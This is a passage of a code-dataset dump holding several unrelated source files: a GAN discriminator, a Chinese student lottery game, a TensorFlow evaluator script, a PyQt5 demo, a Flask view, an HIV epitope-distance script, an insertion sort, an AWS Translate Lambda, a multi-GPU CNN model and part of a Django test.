DeConv2d(gf_dim, (4, 4), strides=(2, 2), padding='SAME', act=None, W_init=w_init, name='g_h5/decon2d')(net_h4)\r\n\r\n    net_h5 = BatchNorm(act=lambda x: tl.act.lrelu(x, 0.2), is_train=is_train, gamma_init=gamma_init, name='g_h5/batch_norm')(net_h5)\r\n\r\n    net_ho = DeConv2d(c_dim, (4, 4), strides=(2, 2), padding='SAME', act=tf.nn.tanh, W_init=w_init, name='g_ho/decon2d')(net_h5)\r\n\r\n    return tl.models.Model(inputs=net_in, outputs=net_ho)\r\n\r\ndef discriminator_txt2img_resnet(input_images, t_txt, is_train=True, reuse=False):\r\n    \"\"\" 64x64 + (txt) --> real/fake \"\"\"\r\n    # https://github.com/hanzhanggit/StackGAN/blob/master/stageI/model.py\r\n    # Discriminator with ResNet : line 197 https://github.com/reedscot/icml2016/blob/master/main_cls.lua\r\n    w_init = tf.random_normal_initializer(stddev=0.02)\r\n    gamma_init=tf.random_normal_initializer(1., 0.02)\r\n    df_dim = 64  # 64 for flower, 196 for MSCOCO\r\n    s = 64 # output image size [64]\r\n    s2, s4, s8, s16 = int(s / 2), int(s / 4), int(s / 8), int(s / 16)\r\n\r\n    tl.layers.set_name_reuse(reuse)\r\n    net_in = Input(input_images)\r\n    net_h0 = Conv2d(df_dim, (4, 4), (2, 2), act=lambda x: tl.act.lrelu(x, 0.2), padding='SAME', W_init=w_init, name='d_h0/conv2d')(net_in)\r\n\r\n    net_h1 = Conv2d(df_dim * 2, (4, 4), (2, 2), act=None, padding='SAME', W_init=w_init, b_init=None, name='d_h1/conv2d')(net_h0)\r\n    net_h1 = BatchNorm(act=lambda x: tl.act.lrelu(x, 0.2), is_train=is_train, gamma_init=gamma_init, name='d_h1/batchnorm')(net_h1)\r\n    net_h2 = Conv2d(df_dim * 4, (4, 4), (2, 2), act=None, padding='SAME', W_init=w_init, b_init=None, name='d_h2/conv2d')(net_h1)\r\n    net_h2 = BatchNorm(act=lambda x: tl.act.lrelu(x, 0.2), is_train=is_train, gamma_init=gamma_init, name='d_h2/batchnorm')(net_h2)\r\n    net_h3 = Conv2d(df_dim * 8, (4, 4), (2, 2), act=None, padding='SAME', W_init=w_init, b_init=None, name='d_h3/conv2d')(net_h2)\r\n    net_h3 = BatchNorm(is_train=is_train, gamma_init=gamma_init, name='d_h3/batchnorm')(net_h3)\r\n\r\n    net = Conv2d(df_dim * 2, (1, 1), (1, 1), act=None, padding='VALID', W_init=w_init, b_init=None, name='d_h4_res/conv2d')(net_h3)\r\n    net = BatchNorm(act=lambda x: tl.act.lrelu(x, 0.2), is_train=is_train, gamma_init=gamma_init, name='d_h4_res/batchnorm')(net)\r\n    net = Conv2d(df_dim * 2, (3, 3), (1, 1), act=None, padding='SAME', W_init=w_init, b_init=None, name='d_h4_res/conv2d2')(net)\r\n    net = BatchNorm(act=lambda x: tl.act.lrelu(x, 0.2), is_train=is_train, gamma_init=gamma_init, name='d_h4_res/batchnorm2')(net)\r\n    net = Conv2d(df_dim * 8, (3, 3), (1, 1), act=None, padding='SAME', W_init=w_init, b_init=None, name='d_h4_res/conv2d3')(net)\r\n    net = BatchNorm(is_train=is_train, gamma_init=gamma_init, name='d_h4_res/batchnorm3')(net)\r\n    net_h4 = Elementwise(act=lambda x: tl.act.lrelu(x, 0.2), combine_fn=tf.add, name='d_h4/add')([net_h3, net])\r\n    # net_h4.outputs = tl.act.lrelu(net_h4.outputs, 0.2)\r\n\r\n    if t_txt is not None:\r\n        net_in2 = Input(t_txt)\r\n        #net_txt = Dense(n_units=t_dim, act=lambda x: tl.act.lrelu(x, 0.2), W_init=w_init, name='d_reduce_txt/dense')(net_txt)\r\n        net_txt = ExpandDims(1, name='d_txt/expanddim1')(net_in2)\r\n        net_txt = ExpandDims(1, name='d_txt/expanddim2')(net_txt)\r\n        net_txt = Tile([1, 4, 4, 1], name='d_txt/tile')(net_txt)\r\n        net_h4_concat = Concat(concat_dim=3, name='d_h3_concat')([net_h4, net_txt])\r\n        # 243 (ndf*8 + 128 or 256) x 4 x 4\r\n        net_h4 = Conv2d(df_dim * 8, (1, 1), (1, 1), padding='VALID', W_init=w_init, b_init=None, name='d_h3/conv2d_2')(net_h4_concat)\r\n        net_h4 = BatchNorm(act=lambda x: tl.act.lrelu(x, 0.2), is_train=is_train, gamma_init=gamma_init, name='d_h3/batch_norm_2')(net_h4)\r\n\r\n        net_ho = Conv2d(1, (s16, s16), (s16, s16), act=tf.nn.sigmoid, padding='VALID', W_init=w_init, name='d_ho/conv2d')(net_h4)\r\n        # 1 x 1 x 1\r\n        net_ho = Flatten()(net_ho)\r\n\r\n\r\n# logits = net_ho.outputs\r\n# net_ho.outputs = tf.nn.sigmoid(net_ho.outputs)\r\n    return tl.models.Model(inputs=[net_in,net_in2], outputs=net_ho)","sub_path":"models_resnet.py","file_name":"models_resnet.py","file_ext":"py","file_size_in_byte":7563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"224811737","text":"# -*- coding: utf-8 -*\n\n# 4、阶段性作业\n# \t小时候我们都玩过抽签游戏,有时间、地点、人物、事件,这也就是最早先的小说生成器\n# 具体可以查看http://www.xuanpai.com/tool/dengji\n# 时间   早上、中午、半夜\n# 人物   小明、小李、小白、小黑\n# 地点   在房上、在地下、在电梯里、在厕所里\n# 事件   吃饭、遛狗、飞翔、看书\n# 通过不同的抽签组合,可以出现很多有意思的事件,比如  早上 小明 在厕所里 吃饭,遇到这样的,就会捧腹大笑,现在通常程序来实现以上功能\n# 功能提示\n# 1、程序一开始,给出响应提示,比如\n# 【1】 增删改查内容\n# 【2】 开始游戏\n# 当输入【1】的时候,列出\n# 【1】增加内容\n# 【2】修改内容\n# 【3】删除内容\n# 【4】查询所有内容\n# 2、输入完成内容后可以开始,如果没有完整,需要提示完善功能,之后输入3412,即可生成内容\n\n\nimport random\n\ntime_l = ['凌晨','清晨','早晨','拂晓', '早上', '中午', '正午', '晌午', '午后', '傍晌', '黄昏', '傍晚', '晚上', '午夜', '夜晚']\ncharacter_l = [\"小明\", \"小李\", \"小白\", \"小黑\"]\nplace_l = [\"在房上\", \"在地下\", \"在电梯里\", \"在厕所里\",\"在太平洋的深处\",\"在天空中\",\"在泳池旁\",]\nthings_l = [\"吃饭\", \"遛狗\", \"飞翔\", \"看书\",\"游泳\",\"斗地主\",\"听歌\",\"跳舞\",\"唱歌\",]\nmain_meanu_d = {1: '增删改查', 2: '开始游戏', 3: '开发中'}\nfunction_meanu_d = {1: '增加词条', 2: '删除词条', 3: '更改词条', 4: '显示所有词条'}\nstart_meanu_d = {1: '输入数字抽签', 2: '随机抽签'}\n\n\n# 1主菜单模块\ndef main_meanu():\n    print('您好!欢迎进入抽签游戏:\\n' + '*' * 20)\n    for k, v in main_meanu_d.items():\n        print('  ●  {:} {:}'.format(k, v))\n    print('*' * 20)\n\n\n# 2增删改查模块\ndef function_meanu():\n    while True:\n        print('*' * 20)\n        for k, v in function_meanu_d.items():\n            print('  ●  {:} {:}'.format(k, v))\n        print('*' * 20)\n        choice = input('请输入数字选择操作(b 返回):\\n')\n        # 2-1增加\n        if choice == \"1\":\n            new_word()\n        # 2-2删除\n        elif choice == \"2\":\n            del_word()\n        # 2-3更改\n        elif choice == \"3\":\n            change_word()\n        # 2-4查找\n        elif choice == \"4\":\n            print_all()\n        # 2-5 退出\n        elif choice == \"b\":\n            return\n        else:\n            print(\"输入有误,重新输入\")\n\n\n# 2-1增加\ndef new_word():\n    active = input('请输入[时间]词条(Enter 跳过):\\n')\n    if active is not '':\n        time_l.append(active)\n    active = input('请输入[人物]词条(Enter 跳过):\\n')\n    if active is not '':\n        character_l.append(active)\n    active = input('请输入[地点]词条(Enter 跳过):\\n')\n    if active is not '':\n        place_l.append(active)\n    active = input('请输入[事件]词条(Enter 跳过):\\n')\n    if active is not '':\n        things_l.append(active)\n\n\n# 2-2删除\ndef del_word():\n    print_all()\n    active = input(\"请输入数字选择:\\n\")\n    if active == \"1\":\n        del_time()\n    if active == \"2\":\n        del_character()\n    if active == \"3\":\n        del_place()\n    if active == \"4\":\n        del_thing()\n\n\n# 2-2-1删除事件\ndef del_time():\n    print('时间', end=\" \")\n    print(time_l, sep=\"、\")\n    active = input(\"请输入要删除的词条:\\n\")\n    if active in time_l:\n        time_l.pop(time_l.index(active))\n        print(\"删除成功\")\n    else:\n        print(\"没有该词条\")\n\n\n# 2-2-2删除人物\ndef del_character():\n    print('人物', end=\" \")\n    print(character_l, sep=\"、\")\n    active = input(\"请输入要删除的词条:\\n\")\n    if active in character_l:\n        character_l.pop(character_l.index(active))\n        print(\"删除成功\")\n    else:\n        print(\"没有该词条\")\n\n\n# 2-2-3删除地点\ndef del_place():\n    print('地点', end=\" \")\n    print(place_l, sep=\"、\")\n    active = input(\"请输入要删除的词条:\\n\")\n    if active in place_l:\n        place_l.pop(place_l.index(active))\n        print(\"删除成功\")\n    else:\n        print(\"没有该词条\")\n\n\n# 2-2-4删除事件\ndef del_thing():\n    print('事件', end=\" \")\n    print(things_l, sep=\"、\")\n    active = input(\"请输入要删除的词条:\\n\")\n    if active in things_l:\n        things_l.pop(things_l.index(active))\n        print(\"删除成功\")\n    else:\n        print(\"没有该词条\")\n\n\n# 2-3更改\ndef change_word():\n    print_all()\n    active = input(\"请输入数字选择:\\n\")\n    if active == \"1\":\n        change_time()\n    if active == \"2\":\n        change_character()\n    if active == \"3\":\n        change_place()\n    if active == \"4\":\n        change_thing()\n\n\n# 2-3-1更改事件\ndef change_time():\n    print('时间', end=\" \")\n    print(time_l, sep=\"、\")\n    active = input(\"请输入要更改的词条:\\n\")\n    if active in time_l:\n        temp = input(\"请输入新的词条:\\n\")\n        time_l[time_l.index(active)] = temp\n        print(\"修改成功\")\n    else:\n        print(\"没有该词条\")\n\n\n# 2-3-2更改人物\ndef change_character():\n    print('人物', end=\" \")\n    print(character_l, sep=\"、\")\n    active = input(\"请输入要更改的词条:\\n\")\n    if active in character_l:\n        temp = input(\"请输入新的词条:\\n\")\n        character_l[character_l.index(active)] = temp\n        print(\"修改成功\")\n    else:\n        print(\"没有该词条\")\n\n\n# 2-3-3更改地点\ndef change_place():\n    print('地点', end=\" \")\n    print(place_l, sep=\"、\")\n    active = input(\"请输入要更改的词条:\\n\")\n    if active in place_l:\n        temp = input(\"请输入新的词条:\\n\")\n        place_l[place_l.index(active)] = temp\n        print(\"修改成功\")\n    else:\n        print(\"没有该词条\")\n\n\n# 2-3-4更改事件\ndef change_thing():\n    print('事件', end=\" \")\n    print(things_l, sep=\"、\")\n    active = input(\"请输入要更改的词条:\\n\")\n    if active in things_l:\n        temp = input(\"请输入新的词条:\\n\")\n        things_l[things_l.index(active)] = temp\n        print(\"修改成功\")\n    else:\n        print(\"没有该词条\")\n\n\n# 2-4显示全部词条\ndef print_all():\n    print('1 时间', end=\" \")\n    print(time_l, sep=\"、\")\n    print('2 人物', end=\" \")\n    print(character_l, sep=\"、\")\n    print('3 地点', end=\" \")\n    print(place_l, sep=\"、\")\n    print('4 事件', end=\" \")\n    print(things_l, sep=\"、\")\n\n\n# 3开始游戏\ndef start_meanu():\n    print('请选择操作:\\n' + '*' * 20)\n    for k, v in start_meanu_d.items():\n        print('  ●  {:} {:}'.format(k, v))\n    print('*' * 20)\n    choice = input('请输入数字选择操作(b 返回):\\n')\n    # 3-1增加\n    if choice == \"1\":\n        num_game()\n    # 2-2删除\n    elif choice == \"2\":\n        random_game()\n    # 2-5 退出\n    elif choice == \"b\":\n        return\n    else:\n        print(\"输入有误,重新输入\")\n\n\n# 3-1输入数字抽签\ndef num_game():\n    time_s = input('请输入不大于{:}的数字:'.format(len(time_l)))\n    character_s = input('请输入不大于{:}的数字:'.format(len(character_l)))\n    place_s = input('请输入不大于{:}的数字:'.format(len(place_l)))\n    things_s = input('请输入不大于{:}的数字:'.format(len(things_l)))\n    print(\"{}\\n{}{}{}{}\\n{}\".format(\"-\" * 20,\n                                    time_l[int(time_s) - 1],\n                                    character_l[int(character_s) - 1],\n                                    place_l[int(place_s) - 1],\n                                    things_l[int(things_s) - 1],\n                                    \"-\" * 20))\n\n\n# 3-2随机抽签\ndef random_game():\n    print(\"{}\\n{}{}{}{}\\n{}\".format(\"-\" * 20,\n                                    random.choice(time_l),\n                                    random.choice(character_l),\n                                    random.choice(place_l),\n                                    random.choice(things_l),\n                                    \"-\" * 20))\n\n\n\n\n\n\ndef main():\n    while True:\n        main_meanu()\n        choice = input('请输入数字选择功能:\\n>>>')\n        if choice == \"1\":\n            function_meanu()\n        elif choice == \"2\":\n            start_meanu()\n        else:\n            print(\"输入错误!\")\n            continue\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"9月-Python核心编程/python阶段性作业二/任务二_抽签游戏/任务二_抽签游戏.py","file_name":"任务二_抽签游戏.py","file_ext":"py","file_size_in_byte":8428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"507908590","text":"import evaluator\nimport argparse\nimport numpy as np\nimport json\nimport os\nimport tensorflow as tf\n\n\ndef create_evaluator_argument_parser():\n    parser = argparse.ArgumentParser(description='Checkpoint Evaluator')\n    parser.add_argument(\n        '--ckpt-path',\n        type=str,\n        required=True,\n        help='Input path to checkpoint to be evaluated.'\n    )\n    parser.add_argument(\n        '--npy-file-0class',\n        type=str,\n        required=True,\n        help='Input path to NPY file of shape [#samples, width, height, 3] for 0-class'\n    )\n    parser.add_argument(\n        '--npy-file-1class',\n        type=str,\n        required=True,\n        help='Input path to NPY file of shape [#samples, width, height, 3] for 1-class'\n    )\n    parser.add_argument(\n        '--output-file',\n        type=str,\n        required=True,\n        help='Output path to store evaluation metrics.'\n    )\n\n    # Optional parameters - may be needed for training, etc, models\n\n    parser.add_argument(\n        '--debug',\n        type=bool,\n        default=False,\n        help='Set to True for debugging.'\n    )\n    parser.add_argument(\n        '--tag-set',\n        type=str,\n        default='serve',\n        help=\"Typically 'serve' or 'train'.\"\n    )\n    parser.add_argument(\n        '--signature-def-key',\n        type=str,\n        default='serving_default',\n        help=\"Typically 'serving_default' or 'train'.\"\n    )\n    parser.add_argument(\n        '--input-tensor-label',\n        type=str,\n        default='input',\n        help=\"Typically 'input' - run with debug=True to see.\"\n    )\n    parser.add_argument(\n        '--output-tensor-label',\n        type=str,\n        default='output',\n        help=\"Typically 'outout' or 'predictions' - run with debug=True to see.\"\n    )\n    parser.add_argument(\n        '--eval-threshold',\n        type=float,\n        default=0.5,\n        help=\"Boundary between 0-class and 1-class\"\n    )\n    return parser\n\n\nif __name__ == '__main__':\n    args = create_evaluator_argument_parser().parse_args()\n    eval = evaluator.Evaluator(\n        debug=args.debug, checkpoint_basename=args.ckpt_path)\n    eval.tag_set = args.tag_set\n    eval.signature_def_key = args.signature_def_key\n    eval.threshold = args.eval_threshold\n    print(\"Loading 0-class file...\")\n    with tf.gfile.GFile(args.npy_file_0class, 'rb') as f:\n        zero_nparr = np.load(f)\n    print(\"Loading 1-class file...\")\n    with tf.gfile.GFile(args.npy_file_1class, 'rb') as f:\n        one_nparr = np.load(f)\n    stats = eval.evaluate(zero_nparr, one_nparr,\n                          args.input_tensor_label, args.output_tensor_label)\n    json_stats = json.dumps(stats, indent=2, sort_keys=True)\n    print(json_stats)\n    with tf.gfile.GFile(args.output_file, 'w') as f:\n        f.write(json_stats)\n","sub_path":"evaluator/evaluator_run.py","file_name":"evaluator_run.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"424045770","text":"N = int(input())\ndef line_arr(row):\n    arr=[' ']*(N+row)\n    i = N+row-1\n    num_star = 0\n    while(i >= 0 and num_star < row+1):\n        arr[i] = '*'\n        i -= 2\n        num_star += 1\n    return arr\n\nfor i in range(N):\n    for x in line_arr(i):\n        print(x,end='')\n    print('')\n        \n\n\n","sub_path":"python_algorithm/Baekjoon/silver/10991.py","file_name":"10991.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"99962889","text":"import sys\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import QFont,QIcon\r\nfrom PyQt5.QtCore import QCoreApplication\r\nclass CenterWindow(QWidget):\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.initUI()\r\n    def initUI(self):\r\n        # self.resize(250,150)\r\n        self.setGeometry(400,400,400,400)\r\n        self.setWindowTitle('让窗口居中')\r\n        self.center()\r\n        self.setFont(QFont(QFont('SansSerif',10)))\r\n        self.setWindowIcon(QIcon('python.png'))\r\n        self.show()\r\n    def center(self):\r\n        desktop = app.desktop()\r\n        self.move((desktop.width() - self.width())/2,(desktop.height()-self.height())/2)\r\nif __name__ == '__main__':\r\n    app = QApplication(sys.argv)\r\n    ce = CenterWindow()\r\n    sys.exit(app.exec_())","sub_path":"Python学习基础知识/高级python篇/第19章:GUI库:PyQt5/让窗口居中.py","file_name":"让窗口居中.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"296360110","text":"from datetime import datetime\nfrom flask import redirect,render_template,url_for,session,current_app\nfrom ..email import send_email\nfrom . import main  # 导入 ./__init__.py文件中的 main对象\nfrom .forms import NameForm  # 当前目录中的froms模块中的对象 (./froms.py)\n\n# form..\nfrom .. import db  # 这个导入app模块(app/__init__.py) 中的对象\n\nfrom ..models import User # 这是导入app目录中的models模块(app/models.py) 中的对象\n\n\n# 视图函数,路由\n@main.route('/', methods=['GET', 'POST'])\ndef index():\n    form = NameForm()\n    if form.validate_on_submit():\n        user = User.query.filter_by(username=form.name.data).first()\n        if user is None:\n            user = User(username=form.name.data)\n            db.session.add(user)\n            session['known'] = False\n            send_email()\n        else:\n            session['known'] = True\n        session['name'] = form.name.data\n        return redirect(url_for('.index'))\n    return render_template('index.html',\n                           form=form, name=session.get('name'),\n                           known=session.get('known', False))\n\n# 需要登入 才能访问的页面\nfrom flask_login import login_required\n@main.route('/mustlogin')\n@login_required\ndef mustlogin():\n    return  \"

hhe\"\n","sub_path":"python/flask_web/A8/app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"48101383","text":"\"\"\" Package Imports \"\"\"\nimport numpy as np\nimport math\n\n\"\"\" Python File Imports\"\"\"\nfrom src.pngs import PNGS\nfrom src.panel import Panel\nfrom src.blosum import BLOSUM\nfrom src.weights import Weights\nfrom src.epitope_dist import get_epitope_distance\nfrom src.ic50 import IC50\n\n\"\"\" Relative Python Paths \"\"\"\nrel_panel_path = './files/seap2020/136_panel_with_4lts.fa'\nrel_weight_path = './files/seap2020/vrc01_wts.4lts.txt'\nrel_blosum_path = './files/seap2020/BLOSUM62.txt'\nrel_ic50_path = './files/seap2020/vrc01_ic50.txt'\n\n\"\"\" Instantiating Each Class \"\"\"\npanel = Panel(rel_panel_path)\nblosum = BLOSUM(rel_blosum_path)\nweights = Weights(rel_weight_path)\nweight_array_modified = np.zeros(panel.get_seq_length())\nic50 = IC50(rel_ic50_path, (panel.get_number_of_seq() - 2))\n\nclass Main:\n \n def get_consensus_sequence():\n return panel.get_consensus_sequence()\n\n def get_blosum_dict():\n return blosum.get_blosum_dict()\n\n def get_ic50_weights():\n return ic50.get_ic50_arr()\n\n def log_base_10(arr):\n new_arr = np.empty((arr.size), dtype=\"object\") \n for x in range(0, arr.size):\n new_arr[x] = math.log10( arr[x] )\n\n return new_arr\n\n\n\"\"\" Turn weights -> weight_array that is usable for epitope distance \"\"\"\ndef init_weight_array_modified():\n VRC_seq = panel.get_seq_from_name('#4lst_G(VRC01)')\n AA_order = weights.get_aa_at_an_order()\n counter = 0\n\n for i in range(0, panel.get_seq_length() - 1):\n # print('i', i)\n if (VRC_seq[i] != '-'):\n weight_array_modified[i] = weights.get_weight_by_order(counter)\n # print('counter', counter)\n # print('VRC_seq[i]', VRC_seq[i], 'AA_order[counter]', AA_order[counter])\n counter += 1\n\n\ndef epitope_distance(consensus_sequence, blosum_dict, ic50_weights):\n init_weight_array_modified()\n panel_ic50 = np.empty((2, (panel.get_number_of_seq() - 2))) \n for i in range(1, panel.get_number_of_seq() - 1):\n panel_ic50[0][i - 1] = get_epitope_distance(panel.get_seq(i), consensus_sequence, blosum_dict, weight_array_modified)\n panel_ic50[1][i - 1] = ic50_weights[i - 1]\n # print(panel_ic50[0][i - 1], panel_ic50[1][i - 1])\n\n return panel_ic50\n\n\"\"\" Testing out the Functions \"\"\"\n\n\"\"\"\nprint(weight_array_modified)\n\nprint('Number of PNGS: ' + str(PNGS('PPNNSNNSNPSN')))\n\nprint('Consensus sequence:', panel.get_consensus_sequence())\nprint('Test:', panel.get_seq('HXB2.DG'))\n\nprint('blosum.get_value(\"A\", \"R\")', blosum.get_value('A', 'R'))\nprint('Panda BLOSUM Matrix')\nprint(blosum.get_panda_matrix())\n\nprint('4lst_G(VRC01) Sequence', panel.get_seq('#4lst_G(VRC01)'))\n\nprint('weights.get_weight_by_site(\"G.44\")', weights.get_weight_by_site('G.44'))\nprint('weights.get_weight_by_order(53)', weights.get_weight_by_order(53))\n\"\"\"\n","sub_path":"Week 4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"36416181","text":"# gram w papier, kamień, nożyce z komputerem\n\nimport random\n\nliczbaElementow = int(input('Ile elementów: '))\n\nplik = open('nazwa.txt', 'w')\n\n\nfor element in range(liczbaElementow):\n plik.write(str(random.randint(1,500))+ '\\n')\n\n# odliczanie\nstart = 0\nstop = 10\n\nwhile start != stop:\n\tprint('Pozostało:',stop)\n\tstop -= 1\n\n# test czy zapusuje\n\n\n","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"631033960","text":"# -*- coding: utf-8 -*-#\n# Name: insert_sort\n# Author: YangRui\n# Date: 2019/10/24\n\n\n\"\"\"\n1、左面的数据为已排序的数组\n2、从右面数组中取值出来,于左面的数组值一一相比较\n\n\"\"\"\n\ndef insert_sort(lyst):\n \"\"\"\n :param lyst:list\n :return: sorted list\n \"\"\"\n tmp_list = list(lyst)\n i = 1\n while i < len(tmp_list):\n item_to_insert = tmp_list[i]\n j = i - 1\n while j >= 0:\n if item_to_insert < tmp_list[j]:\n tmp_list[j + 1] = tmp_list[j]\n j -= 1\n else:\n break\n tmp_list[j + 1] = item_to_insert\n i += 1\n\n return tmp_list\n\n\nif __name__ == '__main__':\n test_array = [0, 9, 6, 8, 0]\n print(insert_sort(test_array))","sub_path":"sorts/insert_sort.py","file_name":"insert_sort.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"637925584","text":"import boto3\nimport json\n\ndef lambda_handler(event, context):\n\n #print(event)\n \n # check that the request has some input body\n if 'body' in event:\n event = json.loads(event[\"body\"])\n\n # get float \"amount\"\n text = event[\"text\"]\n print(text)\n client=boto3.client('translate',region_name=\"us-east-1\")\n result= client.translate_text(Text=text,SourceLanguageCode=\"auto\",TargetLanguageCode=\"ja\")\n \n print(result[\"TranslatedText\"])\n \n res = []\n\n res.append({\"Text\":text,\"TransalateTo\":result[\"TranslatedText\"]})\n # format the response as JSON and return the result\n response = {\n \"statusCode\": \"200\",\n \"headers\": { \"Content-type\": \"application/json\" },\n \"body\": json.dumps({\"res\": res})\n }\n\n return response\n","sub_path":"language_transalte.py","file_name":"language_transalte.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"193095257","text":"# Copyright 2019 Adam Byerly. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nimport tensorflow as tf\nfrom cnn_helpers import make_batch_norm, make_relu, make_max_pool_2x2\nfrom cnn_helpers import make_conv_3x3_no_bias, make_conv_3x3_stride_2_no_bias\nfrom cnn_helpers import merge_towers_and_optimize\nfrom cnn_helpers import make_fc, make_dropout, make_flatten\n\n\ndef make_tower(x_in, y_out, is_training, count_classes):\n with tf.name_scope(\"convs\"):\n conv1 = make_conv_3x3_stride_2_no_bias(\"conv1\", x_in, 32)\n bn1 = make_batch_norm(\"bn1\", conv1, is_training)\n relu1 = make_relu(\"relu1\", bn1)\n\n conv2 = make_conv_3x3_no_bias(\"conv2\", relu1, 32)\n bn2 = make_batch_norm(\"bn2\", conv2, is_training)\n relu2 = make_relu(\"relu2\", bn2)\n\n conv3 = make_conv_3x3_no_bias(\"conv3\", relu2, 32)\n bn3 = make_batch_norm(\"bn3\", conv3, is_training)\n relu3 = make_relu(\"relu3\", bn3)\n pool1 = make_max_pool_2x2(\"pool1\", relu3)\n\n conv4 = make_conv_3x3_no_bias(\"conv4\", pool1, 64)\n bn4 = make_batch_norm(\"bn4\", conv4, is_training)\n relu4 = make_relu(\"relu4\", bn4)\n\n conv5 = make_conv_3x3_no_bias(\"conv5\", relu4, 64)\n bn5 = make_batch_norm(\"bn5\", conv5, is_training)\n relu5 = make_relu(\"relu5\", bn5)\n\n conv6 = make_conv_3x3_no_bias(\"conv6\", relu5, 64)\n bn6 = make_batch_norm(\"bn6\", conv6, is_training)\n relu6 = make_relu(\"relu6\", bn6)\n pool2 = make_max_pool_2x2(\"pool2\", relu6)\n\n conv7 = make_conv_3x3_no_bias(\"conv7\", pool2, 128)\n bn7 = make_batch_norm(\"bn7\", conv7, is_training)\n relu7 = make_relu(\"relu7\", bn7)\n\n conv8 = make_conv_3x3_no_bias(\"conv8\", relu7, 128)\n bn8 = make_batch_norm(\"bn8\", conv8, is_training)\n relu8 = make_relu(\"relu8\", bn8)\n\n conv9 = make_conv_3x3_no_bias(\"conv9\", relu8, 128)\n bn9 = make_batch_norm(\"bn9\", conv9, is_training)\n relu9 = make_relu(\"relu9\", bn9)\n pool3 = make_max_pool_2x2(\"pool3\", relu9)\n\n conv10 = make_conv_3x3_no_bias(\"conv10\", pool3, 256)\n bn10 = make_batch_norm(\"bn10\", conv10, is_training)\n relu10 = make_relu(\"relu10\", bn10)\n\n conv11 = make_conv_3x3_no_bias(\"conv11\", relu10, 256)\n bn11 = make_batch_norm(\"bn11\", conv11, is_training)\n relu11 = make_relu(\"relu11\", bn11)\n\n with tf.name_scope(\"fcs\"):\n flat = make_flatten(\"flatten\", relu11)\n\n keep_prob = tf.cond(is_training,\n lambda: tf.constant(0.5),\n lambda: tf.constant(1.0),\n name=\"keep_prob\")\n\n do1 = make_dropout(\"do1\", flat, keep_prob)\n logits = make_fc(\"fc1\", do1, count_classes)\n\n with tf.name_scope(\"loss\"):\n y_out = tf.stop_gradient(y_out)\n preds = tf.nn.softmax_cross_entropy_with_logits_v2(\n logits=logits, labels=y_out)\n loss = tf.reduce_mean(preds)\n return logits, loss\n\n\ndef run_towers(optimizer, global_step, is_training,\n training_data, validation_data, count_classes, num_gpus):\n with tf.device(\"/device:CPU:0\"), tf.name_scope(\"input/train_or_eval\"):\n images, labels = \\\n tf.cond(is_training, lambda: training_data, lambda: validation_data)\n labels_list = []\n logits_list = []\n loss_list = []\n grads = []\n for i in range(num_gpus):\n tower_name = \"tower%d\" % i\n with tf.device(\"/device:GPU:%d\" % i):\n with tf.name_scope(tower_name):\n these_logits, this_loss = make_tower(\n images, labels, is_training, count_classes)\n logits_list.append(these_logits)\n loss_list.append(this_loss)\n labels_list.append(labels)\n grads.append(optimizer.compute_gradients(this_loss))\n\n train_op, loss, acc_top_1, acc_top_5 = merge_towers_and_optimize(\n optimizer, global_step, grads, logits_list, loss_list, labels_list)\n\n return train_op, loss, acc_top_1, acc_top_5\n","sub_path":"simple/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"352082117","text":"import pandas as pd\nfrom django.test import TestCase\n\nfrom quant_candles.constants import Frequency\nfrom quant_candles.lib import get_current_time\nfrom quant_candles.models import ConstantCandle\n\n\nclass ConstantCandleTest(TestCase):\n databases = {\"default\", \"read_only\"}\n\n def test_daily_cache_reset(self):\n \"\"\"If not same day, daily cache resets.\"\"\"\n now = get_current_time()\n one_day_ago = now - pd.Timedelta(\"1d\")\n candle = ConstantCandle(json_data={\"cache_reset\": Frequency.DAY})\n cache = candle.get_cache_data(\n now, {\"date\": one_day_ago.date(), \"sample_value\": 123}\n )\n self.assertEqual(cache[\"sample_value\"], 0)\n\n def test_daily_cache_does_not_reset(self):\n \"\"\"If same day, daily cache does not reset.\"\"\"\n now = get_current_time()\n candle = ConstantCandle(json_data={\"cache_reset\": Frequency.DAY})\n cache = candle.get_cache_data(now, {\"date\": now.date(), \"sample_value\": 123})\n self.assertEqual(cache[\"sample_value\"], 123)\n\n def test_weekly_cache_reset(self):\n \"\"\"If not same week, weekly cache resets.\"\"\"\n now = get_current_time()\n days = 7 - now.date().weekday() % 7\n next_monday = now + pd.Timedelta(f\"{days}d\")\n candle = 